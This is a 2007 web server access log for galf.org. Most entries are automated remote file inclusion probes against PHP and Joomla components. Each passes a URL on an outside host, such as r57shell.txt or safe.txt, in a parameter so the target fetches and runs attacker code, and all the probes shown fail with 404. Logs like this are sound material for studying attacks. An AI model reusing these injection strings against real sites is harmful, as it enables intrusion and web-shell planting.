69.93.56.66 - - [19/Aug/2007:19:58:01 -0700] "GET /logs//components/com_zoom/includes/database.php?mosConfig_absolute_path=http://usuarios.arnet.com.ar/larry123/safe.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.galf.org"
69.93.56.66 - - [19/Aug/2007:19:58:01 -0700] "GET //components/com_zoom/includes/database.php?mosConfig_absolute_path=http://usuarios.arnet.com.ar/larry123/safe.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808"
208.125.112.244 - - [19/Aug/2007:19:59:36 -0700] "GET /modules/cjaycontent/admin/editor2/spaw_control.class.php?spaw_root=http://www.otriton.xpg.com.br/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.galf.org"
69.93.56.66 - - [19/Aug/2007:20:01:48 -0700] "GET /logs//stats/modules/My_eGallery/index.php?basepath=http://usuarios.arnet.com.ar/larry123/safe.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.galf.org"
69.93.56.66 - - [19/Aug/2007:20:01:48 -0700] "GET //stats/modules/My_eGallery/index.php?basepath=http://usuarios.arnet.com.ar/larry123/safe.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.galf.org"
61.152.158.46 - - [19/Aug/2007:20:01:56 -0700] "GET /logs/administrator/components/com_remository/admin.remository.php?mosConfig_absolute_path=http://usuarios.arnet.com.ar/larry123/safe.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.galf.org"
61.152.158.46 - - [19/Aug/2007:20:01:57 -0700] "GET /administrator/components/com_remository/admin.remository.php?mosConfig_absolute_path=http://usuarios.arnet.com.ar/larry123/safe.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.galf.org"
216.22.48.204 - - [19/Aug/2007:20:05:02 -0700] "GET /logs/administrator/components/com_cropimage/admin.cropcanvas.php?cropimagedir=http://usuarios.arnet.com.ar/larry123/safe.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.galf.org"
216.22.48.204 - - [19/Aug/2007:20:05:02 -0700] "GET /administrator/components/com_cropimage/admin.cropcanvas.php?cropimagedir=http://usuarios.arnet.com.ar/larry123/safe.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.galf.org"
208.66.194.5 - - [19/Aug/2007:20:06:21 -0700] "GET /logs/access.log HTTP/1.1" 200 51880 "-" "Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)" "www.galf.org"
62.75.193.80 - - [19/Aug/2007:20:06:27 -0700] "GET /logs/administrator/components/com_cropimage/admin.cropcanvas.php?cropimagedir=http://usuarios.arnet.com.ar/larry123/safe.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.65"
62.75.193.80 - - [19/Aug/2007:20:06:27 -0700] "GET /administrator/components/com_cropimage/admin.cropcanvas.php?cropimagedir=http://usuarios.arnet.com.ar/larry123/safe.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.65"
61.152.158.46 - - [19/Aug/2007:20:09:37 -0700] "GET /logs/index.php?pag=http://usuarios.arnet.com.ar/larry123/safe.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.galf.org"
61.152.158.46 - - [19/Aug/2007:20:09:38 -0700] "GET /index.php?pag=http://usuarios.arnet.com.ar/larry123/safe.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.galf.org"
62.75.193.80 - - [19/Aug/2007:20:12:48 -0700] "GET /logs/administrator/components/com_linkdirectory/toolbar.linkdirectory.html.php?mosConfig_absolute_path=http://usuarios.arnet.com.ar/larry123/safe.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.galf.org"
62.75.193.80 - - [19/Aug/2007:20:12:49 -0700] "GET /administrator/components/com_linkdirectory/toolbar.linkdirectory.html.php?mosConfig_absolute_path=http://usuarios.arnet.com.ar/larry123/safe.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.galf.org"
61.152.158.46 - - [19/Aug/2007:20:13:11 -0700] "GET /logs/index2.php?x=http://usuarios.arnet.com.ar/larry123/safe.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.galf.org"
61.152.158.46 - - [19/Aug/2007:20:13:15 -0700] "GET /index2.php?x=http://usuarios.arnet.com.ar/larry123/safe.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.galf.org"
216.22.48.204 - - [19/Aug/2007:20:14:20 -0700] "GET /logs/components/com_galleria/galleria.html.php?mosConfig_absolute_path=http://usuarios.arnet.com.ar/larry123/safe.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.galf.org"
216.22.48.204 - - [19/Aug/2007:20:14:20 -0700] "GET /components/com_galleria/galleria.html.php?mosConfig_absolute_path=http://usuarios.arnet.com.ar/larry123/safe.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.galf.org"
62.193.232.6 - - [19/Aug/2007:20:15:02 -0700] "GET /logs//modules/postguestbook/styles/internal/header.php?tpl_pgb_moddir=http://supercop.congruentsoft.net/hak/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.galf.org"
62.193.232.6 - - [19/Aug/2007:20:15:03 -0700] "GET //modules/postguestbook/styles/internal/header.php?tpl_pgb_moddir=http://supercop.congruentsoft.net/hak/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.galf.org"
80.252.144.2 - - [19/Aug/2007:20:18:10 -0700] "GET /logs//modules/xfsection/modify.php?dir_module=http://usuarios.arnet.com.ar/larry123/safe.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.galf.org"
80.252.144.2 - - [19/Aug/2007:20:18:10 -0700] "GET //modules/xfsection/modify.php?dir_module=http://usuarios.arnet.com.ar/larry123/safe.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.galf.org"
195.246.158.53 - - [19/Aug/2007:20:20:09 -0700] "GET /logs/administrator/components/com_remository/admin.remository.php?mosConfig_absolute_path=http://coisas.mxbr.com.br/h/rootlab.jpg?? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.galf.org"
195.246.158.53 - - [19/Aug/2007:20:20:09 -0700] "GET /administrator/components/com_remository/admin.remository.php?mosConfig_absolute_path=http://coisas.mxbr.com.br/h/rootlab.jpg?? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.galf.org"
195.246.158.53 - - [19/Aug/2007:20:20:14 -0700] "GET /logs/index.php?p=http://coisas.mxbr.com.br/h/rootlab.jpg?? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.galf.org"
195.246.158.53 - - [19/Aug/2007:20:20:15 -0700] "GET /index.php?p=http://coisas.mxbr.com.br/h/rootlab.jpg?? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.galf.org"
61.152.158.46 - - [19/Aug/2007:20:20:49 -0700] "GET /logs/index.php?go=http://usuarios.arnet.com.ar/larry123/safe.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.galf.org"
61.152.158.46 - - [19/Aug/2007:20:20:50 -0700] "GET /index.php?go=http://usuarios.arnet.com.ar/larry123/safe.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.galf.org"
195.238.74.76 - - [19/Aug/2007:20:23:21 -0700] "GET /logs/includes/dbal.php?eqdkp_root_path=http://majorland.free.fr/spip/eva/presentation.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.galf.org"
195.238.74.76 - - [19/Aug/2007:20:23:21 -0700] "GET /includes/dbal.php?eqdkp_root_path=http://majorland.free.fr/spip/eva/presentation.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.galf.org"
66.45.244.218 - - [19/Aug/2007:20:23:51 -0700] "GET /logs/modules/My_eGallery/index.php?basepath=http://www.crotz.tk/crotz? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.galf.org"
66.45.244.218 - - [19/Aug/2007:20:23:51 -0700] "GET /modules/My_eGallery/index.php?basepath=http://www.crotz.tk/crotz? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.galf.org"
74.6.19.80 - - [19/Aug/2007:20:23:56 -0700] "GET /robots.txt HTTP/1.0" 404 275 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp)" "www.galf.org"
74.6.23.172 - - [19/Aug/2007:20:23:56 -0700] "GET /cendoc/?D=A HTTP/1.0" 200 510 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp)" "www.galf.org"
208.66.194.5 - - [19/Aug/2007:20:26:34 -0700] "GET /logs/access.log HTTP/1.1" 200 57278 "-" "Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)" "www.galf.org"
74.6.28.215 - - [19/Aug/2007:20:38:45 -0700] "GET /tmp/?N=A HTTP/1.0" 200 504 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp)" "www.galf.org"
72.14.194.20 - - [19/Aug/2007:20:42:57 -0700] "GET / HTTP/1.1" 200 1048 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8.1.3) Gecko/2007030919 Firefox/2.0.0.3" "www.galf.org"
208.66.194.5 - - [19/Aug/2007:20:47:32 -0700] "GET /logs/access.log HTTP/1.1" 200 57829 "-" "Googlebot-Image/1.0" "www.galf.org"
209.200.225.222 - - [19/Aug/2007:20:49:42 -0700] "GET /logs/index.php?go=http://supercop.congruentsoft.net/hak/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.galf.org"
209.200.225.222 - - [19/Aug/2007:20:49:43 -0700] "GET /index.php?go=http://supercop.congruentsoft.net/hak/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.galf.org"
61.152.158.46 - - [19/Aug/2007:20:49:56 -0700] "GET /logs/index2.php?x=http://usuarios.arnet.com.ar/larry123/safe.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.galf.org"
61.152.158.46 - - [19/Aug/2007:20:49:57 -0700] "GET /index2.php?x=http://usuarios.arnet.com.ar/larry123/safe.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79"
208.125.112.244 - - [19/Aug/2007:20:51:25 -0700] "GET /logs//wordpress/wp-content/plugins/myflash/myextractXML.php?path=http://www.otriton.xpg.com.br/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.galf.org"
208.125.112.244 - - [19/Aug/2007:20:51:25 -0700] "GET //wordpress/wp-content/plugins/myflash/myextractXML.php?path=http://www.otriton.xpg.com.br/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.803"
207.47.45.247 - - [19/Aug/2007:20:52:23 -0700] "GET /crossdomain.xml HTTP/1.1" 404 275 "-" "Shockwave Flash" "galf.org"
208.125.112.244 - - [19/Aug/2007:20:58:40 -0700] "GET /logs/access_070723.log//wordpress/wp-content/plugins/myflash/myextractXML.php?path=http://www.otriton.xpg.com.br/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.galf.org"
208.125.112.244 - - [19/Aug/2007:20:58:40 -0700] "GET /logs/access.log//wordpress/wp-content/plugins/myflash/myextractXML.php?path=http://www.otriton.xpg.com.br/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.galf.org"
65.222.176.124 - - [19/Aug/2007:20:58:50 -0700] "GET / HTTP/1.1" 200 1048 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows XP)" "www.galf.org"
65.222.176.124 - - [19/Aug/2007:20:59:51 -0700] "GET /cendoc/ HTTP/1.1" 200 526 "http://www.galf.org/" "Mozilla/4.0 (compatible; MSIE 6.0; Windows XP)" "www.galf.org"
65.222.176.124 - - [19/Aug/2007:20:59:52 -0700] "GET /logs/ HTTP/1.1" 200 4942 "http://www.galf.org/" "Mozilla/4.0 (compatible; MSIE 6.0; Windows XP)" "www.galf.org"
65.222.176.124 - - [19/Aug/2007:20:59:56 -0700] "GET /tmp/ HTTP/1.1" 200 520 "http://www.galf.org/" "Mozilla/4.0 (compatible; MSIE 6.0; Windows XP)" "www.galf.org"
65.222.176.124 - - [19/Aug/2007:20:59:58 -0700] "GET /labia/ HTTP/1.1" 200 524 "http://www.galf.org/" "Mozilla/4.0 (compatible; MSIE 6.0; Windows XP)" "www.galf.org"
65.222.176.124 - - [19/Aug/2007:21:00:48 -0700] "GET /logs/access_070219.log HTTP/1.1" 200 262144 "http://www.galf.org/logs/" "Mozilla/4.0 (compatible; MSIE 6.0; Windows XP)" "www.galf.org"
65.222.176.124 - - [19/Aug/2007:21:00:52 -0700] "GET /logs/access_070716.log HTTP/1.1" 200 196608 "http://www.galf.org/logs/" "Mozilla/4.0 (compatible; MSIE 6.0; Windows XP)" "www.galf.org"
65.222.176.124 - - [19/Aug/2007:21:00:58 -0700] "GET /logs/access_070521.log HTTP/1.1" 200 199384 "http://www.galf.org/logs/" "Mozilla/4.0 (compatible; MSIE 6.0; Windows XP)" "www.galf.org"
65.222.176.124 - - [19/Aug/2007:21:01:00 -0700] "GET /logs/access_070205.log HTTP/1.1" 200 131072 "http://www.galf.org/logs/" "Mozilla/4.0 (compatible; MSIE 6.0; Windows XP)" "www.galf.org"
65.222.176.124 - - [19/Aug/2007:21:01:04 -0700] "GET /logs/access_070430.log HTTP/1.1" 200 196608 "http://www.galf.org/logs/" "Mozilla/4.0 (compatible; MSIE 6.0; Windows XP)" "www.galf.org"
65.222.176.124 - - [19/Aug/2007:21:01:07 -0700] "GET /logs/access_070625.log HTTP/1.1" 200 196608 "http://www.galf.org/logs/" "Mozilla/4.0 (compatible; MSIE 6.0; Windows XP)" "www.galf.org"
65.222.176.124 - - [19/Aug/2007:21:01:11 -0700] "GET /logs/access_070611.log HTTP/1.1" 200 196608 "http://www.galf.org/logs/" "Mozilla/4.0 (compatible; MSIE 6.0; Windows XP)" "www.galf.org"
65.222.176.124 - - [19/Aug/2007:21:01:14 -0700] "GET /logs/access_070423.log HTTP/1.1" 200 239649 "http://www.galf.org/logs/" "Mozilla/4.0 (compatible; MSIE 6.0; Windows XP)" "www.galf.org"
65.222.176.124 - - [19/Aug/2007:21:01:16 -0700] "GET /logs/access_070806.log HTTP/1.1" 200 196608 "http://www.galf.org/logs/" "Mozilla/4.0 (compatible; MSIE 6.0; Windows XP)" "www.galf.org"
65.222.176.124 - - [19/Aug/2007:21:01:20 -0700] "GET /logs/access_070709.log HTTP/1.1" 200 196608 "http://www.galf.org/logs/" "Mozilla/4.0 (compatible; MSIE 6.0; Windows XP)" "www.galf.org"
65.222.176.124 - - [19/Aug/2007:21:01:24 -0700] "GET /logs/access_070514.log HTTP/1.1" 200 196608 "http://www.galf.org/logs/" "Mozilla/4.0 (compatible; MSIE 6.0; Windows XP)" "www.galf.org"
65.222.176.124 - - [19/Aug/2007:21:01:28 -0700] "GET /logs/access_070312.log HTTP/1.1" 200 196608 "http://www.galf.org/logs/" "Mozilla/4.0 (compatible; MSIE 6.0; Windows XP)" "www.galf.org"
65.222.176.124 - - [19/Aug/2007:21:01:32 -0700] "GET /logs/access_070604.log HTTP/1.1" 200 131072 "http://www.galf.org/logs/" "Mozilla/4.0 (compatible; MSIE 6.0; Windows XP)" "www.galf.org"
65.222.176.124 - - [19/Aug/2007:21:01:34 -0700] "GET /logs/access_070723.log HTTP/1.1" 200 196608 "http://www.galf.org/logs/" "Mozilla/4.0 (compatible; MSIE 6.0; Windows XP)" "www.galf.org"
65.222.176.124 - - [19/Aug/2007:21:01:39 -0700] "GET /logs/access_070416.log HTTP/1.1" 200 196608 "http://www.galf.org/logs/" "Mozilla/4.0 (compatible; MSIE 6.0; Windows XP)" "www.galf.org"
65.222.176.124 - - [19/Aug/2007:21:01:41 -0700] "GET /logs/access_070402.log HTTP/1.1" 200 196608 "http://www.galf.org/logs/" "Mozilla/4.0 (compatible; MSIE 6.0; Windows XP)" "www.galf.org"
65.222.176.124 - - [19/Aug/2007:21:01:44 -0700] "GET /logs/access_070618.log HTTP/1.1" 200 196608 "http://www.galf.org/logs/" "Mozilla/4.0 (compatible; MSIE 6.0; Windows XP)" "www.galf.org"
65.222.176.124 - - [19/Aug/2007:21:01:47 -0700] "GET /logs/access_070813.log HTTP/1.1" 200 196608 "http://www.galf.org/logs/" "Mozilla/4.0 (compatible; MSIE 6.0; Windows XP)" "www.galf.org"
87.101.4.42 - - [19/Aug/2007:21:03:39 -0700] "GET /logs/administrator/components/com_remository/admin.remository.php?mosConfig_absolute_path=http://marketingpower.ifrance.com/.z.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.galf.org"
87.101.4.42 - - [19/Aug/2007:21:03:39 -0700] "GET /administrator/components/com_remository/admin.remository.php?mosConfig_absolute_path=http://marketingpower.ifrance.com/.z.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.galf.org"
70.85.142.186 - - [19/Aug/2007:21:04:31 -0700] "GET /logs/administrator/components/com_remository/admin.remository.php?mosConfig_absolute_path=http://usuarios.arnet.com.ar/larry123/safe.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.galf.org"
70.85.142.186 - - [19/Aug/2007:21:04:31 -0700] "GET /administrator/components/com_remository/admin.remository.php?mosConfig_absolute_path=http://usuarios.arnet.com.ar/larry123/safe.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.galf.org"
81.222.134.122 - - [19/Aug/2007:21:05:49 -0700] "GET /logs/administrator/components/com_remository/admin.remository.php?mosConfig_absolute_path=http://marketingpower.ifrance.com/.z.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.galf.org"
81.222.134.122 - - [19/Aug/2007:21:05:50 -0700] "GET /administrator/components/com_remository/admin.remository.php?mosConfig_absolute_path=http://marketingpower.ifrance.com/.z.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.galf.org"
209.211.196.5 - - [19/Aug/2007:21:08:01 -0700] "GET /logs/[Scripthttp://br.geocities.com/prcanteiro/cmd2.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.galf.org"
209.211.196.5 - - [19/Aug/2007:21:08:01 -0700] "GET /[Scripthttp://br.geocities.com/prcanteiro/cmd2.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.galf.org"
208.66.194.5 - - [19/Aug/2007:21:12:00 -0700] "GET /logs/access.log HTTP/1.1" 200 65627 "-" "Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)" "www.galf.org"
72.243.121.251 - - [19/Aug/2007:21:21:31 -0700] "GET /logs/wordtube/wordtube-button.php?wpPATH=http://majorland.free.fr/spip/eva/presentation.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.galf.org"
72.243.121.251 - - [19/Aug/2007:21:21:35 -0700] "GET /wordtube/wordtube-button.php?wpPATH=http://majorland.free.fr/spip/eva/presentation.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.galf.org"
208.66.194.5 - - [19/Aug/2007:21:26:56 -0700] "GET /logs/access.log HTTP/1.1" 200 66214 "-" "Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)" "www.galf.org"
195.246.158.53 - - [19/Aug/2007:21:27:00 -0700] "GET /logs/administrator/components/com_remository/admin.remository.php?mosConfig_absolute_path=http://usuarios.arnet.com.ar/larry123/safe.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.galf.org"
195.246.158.53 - - [19/Aug/2007:21:27:01 -0700] "GET /administrator/components/com_remository/admin.remository.php?mosConfig_absolute_path=http://usuarios.arnet.com.ar/larry123/safe.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.galf.org"
201.155.69.116 - - [19/Aug/2007:21:27:52 -0700] "GET ////classes/adodbt/sql.php?classes_dir=http://usuarios.arnet.com.ar/larry123/safe.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.galf.org"
195.246.158.53 - - [19/Aug/2007:21:29:18 -0700] "GET /logs/administrator/components/com_cropimage/admin.cropcanvas.php?cropimagedir=http://usuarios.arnet.com.ar/larry123/safe.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.galf.org"
195.246.158.53 - - [19/Aug/2007:21:29:19 -0700] "GET /administrator/components/com_cropimage/admin.cropcanvas.php?cropimagedir=http://usuarios.arnet.com.ar/larry123/safe.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.galf.org"
74.6.28.105 - - [19/Aug/2007:21:32:43 -0700] "GET /logs/?N=D HTTP/1.0" 200 4926 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp)" "www.galf.org"
74.6.23.12 - - [19/Aug/2007:21:33:54 -0700] "GET /logs/access_070820.log HTTP/1.0" 200 589824 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp)" "www.galf.org"
72.243.121.251 - - [19/Aug/2007:21:36:03 -0700] "GET /logs/includes/dbal.php?eqdkp_root_path=http://majorland.free.fr/spip/eva/presentation.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.galf.org"
72.243.121.251 - - [19/Aug/2007:21:36:08 -0700] "GET /includes/dbal.php?eqdkp_root_path=http://majorland.free.fr/spip/eva/presentation.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.galf.org"
62.193.232.6 - - [19/Aug/2007:21:38:04 -0700] "GET /logs/access_070730.log//modules/postguestbook/styles/internal/header.php?tpl_pgb_moddir=http://supercop.congruentsoft.net/hak/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79"
62.193.232.6 - - [19/Aug/2007:21:38:04 -0700] "GET //modules/postguestbook/styles/internal/header.php?tpl_pgb_moddir=http://supercop.congruentsoft.net/hak/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.galf.org"
62.193.232.6 - - [19/Aug/2007:21:38:05 -0700] "GET /logs//modules/postguestbook/styles/internal/header.php?tpl_pgb_moddir=http://supercop.congruentsoft.net/hak/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.galf.org"
62.193.232.6 - - [19/Aug/2007:21:38:05 -0700] "GET /logs/access_070723.log//modules/postguestbook/styles/internal/header.php?tpl_pgb_moddir=http://supercop.congruentsoft.net/hak/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.galf.org"
62.193.232.6 - - [19/Aug/2007:21:38:15 -0700] "GET /logs/access_070730.log//modules/postguestbook/styles/internal/header.php?tpl_pgb_moddir=http://supercop.congruentsoft.net/hak/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.galf.org"
62.193.232.6 - - [19/Aug/2007:21:38:15 -0700] "GET //modules/postguestbook/styles/internal/header.php?tpl_pgb_moddir=http://supercop.congruentsoft.net/hak/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.galf.org"
62.193.232.6 - - [19/Aug/2007:21:38:16 -0700] "GET /logs//modules/postguestbook/styles/internal/header.php?tpl_pgb_moddir=http://supercop.congruentsoft.net/hak/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.galf.org"
62.193.232.6 - - [19/Aug/2007:21:38:16 -0700] "GET /logs/access_070723.log//modules/postguestbook/styles/internal/header.php?tpl_pgb_moddir=http://supercop.congruentsoft.net/hak/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79"
194.226.194.21 - - [19/Aug/2007:21:38:41 -0700] "GET /administrator/components/com_linkdirectory/toolbar.linkdirectory.html.php?mosConfig_absolute_path=http://kelserific.byethost7.com/cmd/r57shell.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.galf.org"
207.47.45.247 - - [19/Aug/2007:21:43:33 -0700] "GET /logs/access_070813.log HTTP/1.1" 304 - "file://C|\\Documents and Settings\\Administrator\\Desktop\\FlexFinance\\FlexFinance.swf" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322; .NET CLR 2.0.50727; .NET CLR 3.0.04506.590; .NET CLR 3.5.20706)" "galf.org"
61.152.158.46 - - [19/Aug/2007:21:46:17 -0700] "GET /logs/index2.php?x=http://usuarios.arnet.com.ar/larry123/safe.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.galf.org"
61.152.158.46 - - [19/Aug/2007:21:46:17 -0700] "GET /index2.php?x=http://usuarios.arnet.com.ar/larry123/safe.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.galf.org"
65.55.208.230 - - [19/Aug/2007:21:48:20 -0700] "GET /robots.txt HTTP/1.0" 404 275 "-" "msnbot/1.0 (+http://search.msn.com/msnbot.htm)" "www.galf.org"
65.55.208.230 - - [19/Aug/2007:21:48:20 -0700] "GET /labia/ HTTP/1.0" 200 508 "-" "msnbot/1.0 (+http://search.msn.com/msnbot.htm)" "www.galf.org"
81.168.228.204 - - [19/Aug/2007:21:48:27 -0700] "GET /logs/index.php?p=http://usuarios.arnet.com.ar/larry123/safe.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.galf.org"
81.168.228.204 - - [19/Aug/2007:21:48:28 -0700] "GET /index.php?p=http://usuarios.arnet.com.ar/larry123/safe.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.galf.org"
208.66.194.5 - - [19/Aug/2007:21:51:24 -0700] "GET /logs/access.log HTTP/1.1" 200 71740 "-" "Googlebot-Image/1.0" "www.galf.org"
62.75.193.80 - - [19/Aug/2007:21:56:02 -0700] "GET /logs/administrator/components/com_cropimage/admin.cropcanvas.php?cropimagedir=http://usuarios.arnet.com.ar/larry123/safe.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.galf.org"
62.75.193.80 - - [19/Aug/2007:21:56:03 -0700] "GET /administrator/components/com_cropimage/admin.cropcanvas.php?cropimagedir=http://usuarios.arnet.com.ar/larry123/safe.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.galf.org"
195.246.158.53 - - [19/Aug/2007:21:58:24 -0700] "GET /logs/index2.php?content=http://usuarios.arnet.com.ar/larry123/safe.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.galf.org"
195.246.158.53 - - [19/Aug/2007:21:58:24 -0700] "GET /index2.php?content=http://usuarios.arnet.com.ar/larry123/safe.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.galf.org"
195.246.158.53 - - [19/Aug/2007:21:58:33 -0700] "GET /logs/index2.php?x=http://usuarios.arnet.com.ar/larry123/safe.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.galf.org"
195.246.158.53 - - [19/Aug/2007:21:58:33 -0700] "GET /index2.php?x=http://usuarios.arnet.com.ar/larry123/safe.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.galf.org"
216.22.48.204 - - [19/Aug/2007:22:00:04 -0700] "GET /logs/modules/My_eGallery/index.php?basepath=http://usuarios.arnet.com.ar/larry123/safe.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.galf.org"
216.22.48.204 - - [19/Aug/2007:22:00:04 -0700] "GET /modules/My_eGallery/index.php?basepath=http://usuarios.arnet.com.ar/larry123/safe.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.galf.org"
62.75.193.80 - - [19/Aug/2007:22:01:30 -0700] "GET /logs/access_070716.log/administrator/components/com_cropimage/admin.cropcanvas.php?cropimagedir=http://usuarios.arnet.com.ar/larry123/safe.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.galf.org"
62.75.193.80 - - [19/Aug/2007:22:01:50 -0700] "GET /logs/access_070806.log/administrator/components/com_cropimage/admin.cropcanvas.php?cropimagedir=http://usuarios.arnet.com.ar/larry123/safe.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.galf.org"
62.75.193.80 - - [19/Aug/2007:22:01:50 -0700] "GET /logs/access_070730.log/administrator/components/com_cropimage/admin.cropcanvas.php?cropimagedir=http://usuarios.arnet.com.ar/larry123/safe.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.galf.org"
195.246.158.53 - - [19/Aug/2007:22:03:03 -0700] "GET /logs/index2.php?url_page=http://usuarios.arnet.com.ar/larry123/safe.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.galf.org"
195.246.158.53 - - [19/Aug/2007:22:03:03 -0700] "GET /index2.php?url_page=http://usuarios.arnet.com.ar/larry123/safe.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.65"
194.226.194.21 - - [19/Aug/2007:22:04:44 -0700] "GET //administrator/components/com_uhp/uhp_config.php?mosConfig_absolute_path=http://kelserific.byethost7.com/cmd/r57shell.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.galf.org"
61.152.158.46 - - [19/Aug/2007:22:06:36 -0700] "GET /index2.php?x=http://usuarios.arnet.com.ar/larry123/safe.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79"
195.246.158.53 - - [19/Aug/2007:22:09:35 -0700] "GET /logs///admin/editor2/spaw_control.class.php?spaw_root=http://usuarios.arnet.com.ar/larry123/safe.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.galf.org"
195.246.158.53 - - [19/Aug/2007:22:09:35 -0700] "GET ///admin/editor2/spaw_control.class.php?spaw_root=http://usuarios.arnet.com.ar/larry123/safe.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.galf.org"
